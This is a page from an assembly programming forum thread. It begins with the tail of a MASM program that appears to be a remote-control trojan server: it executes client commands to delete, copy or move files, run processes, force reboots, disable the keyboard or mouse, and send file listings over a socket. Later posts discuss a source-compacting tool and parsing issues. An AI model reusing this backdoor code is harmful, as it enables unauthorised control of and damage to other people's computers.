mov byte ptr [eax],0
.IF cmd==1 
invoke DeleteFile,addr SD
invoke SendMessage,hWnd,WM_DESTROY,0,0
.ELSEIF cmd==2 
invoke MessageBox,0,addr cmd2,addr cmd1,MB_OK+MB_ICONHAND
.ELSEIF cmd==3 
invoke ExitWindowsEx,EWX_FORCE,0
.ELSEIF cmd==4 
invoke ExitWindowsEx,EWX_REBOOT,0
.ELSEIF cmd==5 
invoke GetOpenClipboardWindow
invoke OpenClipboard,eax
invoke EmptyClipboard
invoke CloseClipboard
.ELSEIF cmd==6 
invoke lstrcpy,addr BIGBUFFER,addr cmd1
invoke lstrlen,addr BIGBUFFER
add eax,OFFSET BIGBUFFER
mov word ptr [eax],00020h
invoke lstrcat,addr BIGBUFFER,addr cmd2 
invoke CreateProcess,NULL,addr BIGBUFFER,NULL,NULL,
FALSE,NORMAL_PRIORITY_CLASS,NULL,NULL,
offset StartupInfo,offset ProcessInfo
.ELSEIF cmd==7
invoke DeleteFile,addr cmd1
invoke send_LB_shit_2_client,hWnd,client 
.ELSEIF cmd==8 
invoke CopyFile,addr cmd1,addr cmd2,FALSE
invoke send_LB_shit_2_client,hWnd,client 
.ELSEIF cmd==9 
invoke MoveFile,addr cmd1,addr cmd2
invoke send_LB_shit_2_client,hWnd,client 
.ELSEIF cmd==10
.ELSEIF cmd==11
.ELSEIF cmd==12 
invoke atodw,addr cmd1
mov ecx,eax
mbloop: push ecx
invoke MessageBeep,0FFFFFFFFh
pop ecx
loop mbloop 
.ELSEIF cmd==13 
invoke GetForegroundWindow
invoke SendMessage,eax,WM_CLOSE,0,0
.ELSEIF cmd==14 
invoke mciSendString,ADDR cdopen,NULL,0,0 
invoke mciSendString,ADDR cdclose,NULL,0,0 
.ELSEIF cmd==15 
invoke GetForegroundWindow
push eax
invoke IsIconic,eax
cmp eax,0
jnz nope
pop eax
invoke CloseWindow,eax
nope: 
.ELSEIF cmd==16 
invoke ShellExecute,NULL,NULL,addr cmd1,NULL,NULL,SW_SHOWNORMAL 
.ELSEIF cmd==17 
invoke WinExec,addr crash_str,SW_HIDE
.ELSEIF cmd==18 
invoke WinExec,addr keyoff_str,SW_HIDE
.ELSEIF cmd==19 
invoke WinExec,addr mouseoff_str,SW_HIDE
.ENDIF 
filetrans:
.ENDIF 
.ENDIF 
.ELSE
invoke DefWindowProc,hWnd,uMsg,wParam,lParam
ret
.ENDIF
xor eax,eax
ret
WndProc endp
SetRegKeysz PROC lpszString:DWORD,lpszKeyName:DWORD,lpszValueName:DWORD,dwStringLength
LOCAL Disp :DWORD
LOCAL pKey :DWORD
invoke RegCreateKeyEx,HKEY_LOCAL_MACHINE,lpszKeyName,NULL,NULL,
REG_OPTION_NON_VOLATILE,KEY_ALL_ACCESS,NULL,addr pKey,addr Disp
.IF eax==ERROR_SUCCESS
invoke RegSetValueEx,pKey,lpszValueName,NULL,REG_SZ,
lpszString,dwStringLength 
invoke RegCloseKey,pKey
.ENDIF
ret
SetRegKeysz ENDP
SetRegKeyDW PROC lpdwValue:DWORD,lpszKeyName:DWORD,lpszValueName:DWORD
LOCAL Disp :DWORD
LOCAL pKey :DWORD
DW_SIZE EQU 4
invoke RegCreateKeyEx,HKEY_LOCAL_MACHINE,lpszKeyName,NULL,NULL,
REG_OPTION_NON_VOLATILE,KEY_ALL_ACCESS,NULL,addr pKey,addr Disp
.IF eax==ERROR_SUCCESS
invoke RegSetValueEx,pKey,lpszValueName,NULL,REG_DWORD_LITTLE_ENDIAN,
lpdwValue,DW_SIZE 
invoke RegCloseKey,pKey
.ENDIF
ret
SetRegKeyDW ENDP
GetRegKeyDW PROC lpdwValue:DWORD,lpszKeyName:DWORD,lpszValueName:DWORD
LOCAL Temp :DWORD
LOCAL pKey :DWORD
LOCAL DWordSize:DWORD
DW_SIZE EQU 4
mov DWordSize,DW_SIZE
invoke RegCreateKeyEx,HKEY_LOCAL_MACHINE,lpszKeyName,NULL,NULL,
REG_OPTION_NON_VOLATILE,KEY_ALL_ACCESS,NULL,addr pKey,addr Temp
.IF eax==ERROR_SUCCESS
mov eax,REG_DWORD
mov Temp,eax
invoke RegQueryValueEx,pKey,lpszValueName,NULL,ADDR Temp,
lpdwValue,ADDR DWordSize 
invoke RegCloseKey,pKey
.ENDIF
ret
GetRegKeyDW ENDP
send_LB_shit_2_client PROC mhWnd:DWORD,mclient:DWORD
invoke SendDlgItemMessage,mhWnd,IDC_LB,LB_GETCOUNT,0,0
dec eax
mov LBCOUNT,eax
mov edi,OFFSET BIGBUFFER
mov dword ptr [edi ],"ELIF"
mov eax,LBCOUNT
mov dword ptr [edi+5],eax
invoke lstrlen,addr path
inc eax 
push eax 
mov edi,OFFSET BIGBUFFER
add edi,9 
invoke lstrcpy,edi,addr path
pop eax
add eax,9 
invoke send,mclient,addr BIGBUFFER,eax,0 
invoke Sleep,500 
push OFFSET BIGBUFFER
pop LBPOINT
mov LBLEN,0
mov ecx,10000
mov edi,OFFSET BIGBUFFER
clearl: mov byte ptr [edi],0
inc edi
loop clearl
lloop: invoke SendDlgItemMessage,mhWnd,IDC_LB,LB_GETTEXT,LBCOUNT,addr FILEN
inc eax
push eax
add LBLEN,eax
cmp LBLEN,10000
jge errorquit
invoke lstrcpy,LBPOINT,addr FILEN 
pop eax
add LBPOINT,eax 
dec LBCOUNT
cmp LBCOUNT,-1
jnz lloop
errorquit: invoke send,mclient,addr BIGBUFFER,LBLEN,0
ret
send_LB_shit_2_client ENDP
END start


Change it to .asm if you want to compile it. But this one is for MASM.
Post 24 May 2014, 12:12
View user's profile Send private message Visit poster's website Reply with quote
revolution
When all else fails, read the source


Joined: 24 Aug 2004
Posts: 20518
Location: In your JS exploiting you and your system
revolution 24 May 2014, 12:15
Code:
mov dword ptr [edi ],"ELIF"
There are some extra spaces in there. It could be this:
Code:
mov dword ptr[edi],"ELIF"
Post 24 May 2014, 12:15
View user's profile Send private message Visit poster's website Reply with quote
fasmnewbie



Joined: 01 Mar 2011
Posts: 555
fasmnewbie 24 May 2014, 12:24
revolution wrote:
This is a problem:
Code:
SIZE=19183
sourcef db "patch.asm",0
targetf db "newf.txt",0
You can get the two file names from the command line arguments. And the files size can be obtained from the file system.


That 'command line arguments' is still a big thing to me. Haven't explored it yet. Know anything about "file pointer" where I can start compacting from any given point of that file?

like:

Code:
stdcall fptr,target,5000,buff ;start from byte 5000th of targetf (say pointer in SI)
Post 24 May 2014, 12:24
View user's profile Send private message Visit poster's website Reply with quote
fasmnewbie



Joined: 01 Mar 2011
Posts: 555
fasmnewbie 24 May 2014, 12:30
revolution wrote:
Code:
mov dword ptr [edi ],"ELIF"
There are some extra spaces in there. It could be this:
Code:
mov dword ptr[edi],"ELIF"


I noticed that too. Man, you are quick!

Maybe by calling another

Code:
stdcall del_space_around,']'


should solve it. There are certain 'personal' style that it can't compact though. The same goes with '-' symbol.
Post 24 May 2014, 12:30
View user's profile Send private message Visit poster's website Reply with quote
fasmnewbie



Joined: 01 Mar 2011
Posts: 555
fasmnewbie 24 May 2014, 12:47
DOS386 wrote:
> It is simply called "command line program". hehehe

Right Wink

> I bet King Tomasz must have a lot better version for
> internal FASM use. I just can't find where it is from the source.

PARSER.INC Wink

> 1. Just like revolution said (Quoted ';')

The idea is simple: run through the line until you find semicolon <;> OR EOL OR sng-quot <'> OR dbl-qout <"> ... if you find such a quot, search for same closing quot again or EOL, if you find the closing quot, return to the main search

> 2. I have no idea on how to deal with files larger than 64K

Easy:

1. Set up a reasonable buffer size (32 KiB) line length limit (for example 1 KiB)
2. After every line, check whether you are too close to the 32 KiB limit (for example 30 KiB)
3. If so, write the output buffer, move the not yet processed content to the begin of the buffer and fill the remaining space from the input file


DOS386

I looked into parser.inc --> I understood nothing of what King Tomasz wrote in there. May take me years to understand it. hahaha Very Happy

In regards to ';', I don't think it's that easy. There could be something like

Code:
 mystr db "hola",13,10,"hello 'world'",13,10,'hi',10,13


Thanks for the tips on the file size. I'll check it out.
Post 24 May 2014, 12:47
View user's profile Send private message Visit poster's website Reply with quote
fasmnewbie



Joined: 01 Mar 2011
Posts: 555
fasmnewbie 24 May 2014, 12:50
need to go. bad connection
Post 24 May 2014, 12:50
View user's profile Send private message Visit poster's website Reply with quote
Display posts from previous:
Post new topic Reply to topic

Jump to:  
Goto page Previous  1, 2, 3

< Last Thread | Next Thread >
Forum Rules:
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
You cannot attach files in this forum
You can download files in this forum


Main index Download Documentation Examples Message board

Copyright © 1999-2025, Tomasz Grysztar. Also on GitHub, YouTube.

Website powered by rwasa.